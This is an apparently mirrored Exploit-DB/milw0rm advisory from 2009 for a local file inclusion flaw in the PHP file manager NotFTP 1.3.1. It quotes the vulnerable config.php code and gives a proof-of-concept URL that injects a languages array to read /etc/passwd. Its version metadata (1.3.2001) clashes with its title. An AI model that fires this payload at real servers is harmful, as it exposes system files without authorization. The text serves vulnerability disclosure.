NotFTP 1.3.1 Local File Include

vendor:

NotFTP

by:

Kacper

5.5

CVSS

MEDIUM

Local File Include

CWE

Product Name: NotFTP

Affected Version From: 1.3.2001

Affected Version To: 1.3.2001

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2009

NotFTP 1.3.1 Local File Include

The NotFTP 1.3.1 application is vulnerable to local file inclusion. By manipulating the 'newlang' parameter in the 'config.php' file, an attacker can include arbitrary files, potentially leading to unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of NotFTP or implement proper input validation and sanitization to prevent file inclusion attacks.

Source

Exploit-DB raw data:

NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/


Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/

DC++ Hub address: bluber-hub.no-ip.biz:2008

Vuln:

File config.php:

#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################

if (isset($newlang))
{
   require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
   require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
   require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}

# NotFTP version. Changing this would be silly. So don't.

PoC:

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd

The End

========= 

# milw0rm.com [2009-04-21]